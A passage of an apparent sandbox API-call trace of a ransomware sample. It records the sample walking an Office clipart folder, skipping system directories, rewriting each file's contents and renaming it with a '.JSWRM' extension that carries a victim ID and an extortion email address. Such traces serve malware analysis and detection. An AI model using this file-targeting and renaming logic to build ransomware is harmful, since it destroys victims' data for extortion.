lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x37d0) returned 0x24d210 [0089.072] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x37d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x37d0, lpOverlapped=0x0) returned 1 [0089.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.074] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x37d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x37d0, lpOverlapped=0x0) returned 1 [0089.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.074] CloseHandle (hObject=0x314) returned 1 [0089.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0089.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0089.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0089.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.075] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0089.075] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6180, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0294991.WMF", cAlternateFileName="")) returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2=".") returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="..") returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="...") returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="windows") returned -1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="recovery") returned -1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="perflogs") returned -1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="documents and settings") returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="system volume information") returned -1 [0089.076] lstrcmpiW (lpString1="J0294991.WMF", lpString2="msocache") returned -1 [0089.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294991.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294991.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0294991.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294991.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0294991.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0294991.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0089.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.077] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24960) returned 1 [0089.077] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6180) returned 0x24d210 [0089.077] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6180, lpOverlapped=0x0) returned 1 [0089.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.080] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6180, lpOverlapped=0x0) returned 1 [0089.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.080] CloseHandle (hObject=0x314) returned 1 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0089.081] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0295069.WMF", cAlternateFileName="")) returned 1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2=".") returned 1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="..") returned 1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="...") returned 1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="windows") returned -1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="recovery") returned -1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="perflogs") returned -1 [0089.081] lstrcmpiW (lpString1="J0295069.WMF", lpString2="documents and settings") returned 1 [0089.082] lstrcmpiW (lpString1="J0295069.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.082] lstrcmpiW (lpString1="J0295069.WMF", lpString2="system volume information") returned -1 [0089.082] lstrcmpiW (lpString1="J0295069.WMF", lpString2="msocache") returned -1 [0089.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0295069.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0295069.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0295069.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0295069.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0295069.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0295069.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0089.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.083] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8626) returned 1 [0089.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21b0) returned 0x205850 [0089.083] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21b0, lpOverlapped=0x0) returned 1 [0089.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.085] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21b0, lpOverlapped=0x0) returned 1 [0089.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.085] CloseHandle (hObject=0x314) returned 1 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0089.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0089.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0089.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0089.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0089.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.086] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe42c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0296277.WMF", cAlternateFileName="")) returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2=".") returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="..") returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="...") returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="windows") returned -1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="recovery") returned -1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="perflogs") returned -1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="documents and settings") returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="system volume information") returned -1 [0089.086] lstrcmpiW (lpString1="J0296277.WMF", lpString2="msocache") returned -1 [0089.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296277.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296277.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296277.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0089.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296277.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296277.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296277.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.088] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=58412) returned 1 [0089.088] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe420) returned 0x24d210 [0089.088] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xe420, lpOverlapped=0x0) returned 1 [0089.093] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.094] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xe420, lpOverlapped=0x0) returned 1 [0089.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.095] CloseHandle (hObject=0x314) returned 1 [0089.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0089.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 